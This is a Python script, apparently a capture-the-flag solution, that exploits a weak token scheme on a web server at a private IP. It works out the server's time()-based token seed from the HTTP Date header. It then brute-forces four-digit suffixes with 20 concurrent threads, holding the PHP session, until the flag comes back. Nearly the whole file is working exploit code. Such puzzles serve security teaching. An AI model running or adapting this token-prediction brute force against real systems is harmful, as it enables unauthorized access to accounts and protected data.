try:
    # pip install requests rich
    import requests
    from rich.console import Console
    from rich.progress import Progress, SpinnerColumn, TimeElapsedColumn
    from rich.traceback import install
    from rich import inspect
    from rich import print
except ImportError as e:
    print(e, "- Is it installed?")
    exit(1)

# -------------------------

from datetime import datetime, timezone
from concurrent.futures import ThreadPoolExecutor as Executor

MAX_WORKERS = 20  # Less aggressive but still fast enough

install(show_locals=True)
console = Console()


def main() -> None:
    client = requests.Session()

    entrypoint = "http://10.0.160.47"
    # Since the site uses `session_start`, we need to
    # hold our session in order to exploit the vulnerability
    initial_response = client.get(entrypoint, params={"token": "DUMMY"})

    inspect(initial_response)
    print("[yellow](i)[/] Launching exploit...")

    # The server uses the time() value to generate the token so we
    # need to extract that value to bypass token verification
    date_value = initial_response.headers["Date"]
    date_obj = datetime.strptime(date_value, "%a, %d %b %Y %H:%M:%S %Z")
    # Convert the datetime object to UTC timezone
    date_obj = date_obj.replace(tzinfo=timezone.utc)
    # Get the timestamp in seconds since the epoch
    server_timestamp = int(date_obj.timestamp())

    print(f"{date_value = }\n  -> {date_obj = }\n    -> {server_timestamp = }")

    already_found = False

    with Progress(
        SpinnerColumn(),
        *Progress.get_default_columns(),
        TimeElapsedColumn(),
        console=console,
    ) as progress:
        timer = progress.add_task(
            "[yellow] Processing...", total=None, complete_style="green"
        )

        # We define how we are going to process possible tokens
        def send_token_attempt(guess: int) -> None:
            nonlocal already_found
            if already_found:
                return

            possible_token = f"{server_timestamp}{guess}"
            console.log(f"[yellow](i)[/] Trying with token: '{possible_token}'...")
            response = client.get(entrypoint, params={"token": possible_token})
            # inspect(response)
            if "Malicious" not in response.text:
                console.log(f"[green](✓)[/] Here's your flag: [cyan]{response.text}[/]")
                already_found = True
                return

        # We need to check 8999 possible values to get our flag
        # Since we don't have all day, i'll use some concurrency
        # to speed up the process a bit
        with Executor(max_workers=MAX_WORKERS) as executor:
            for future in executor.map(send_token_attempt, range(1000, 9999 + 1)):
                # Do nothing here...
                pass

        progress.update(timer, description="[green]Completed!", total=100)
        progress.update(timer, advance=100)


if __name__ == "__main__":
    main()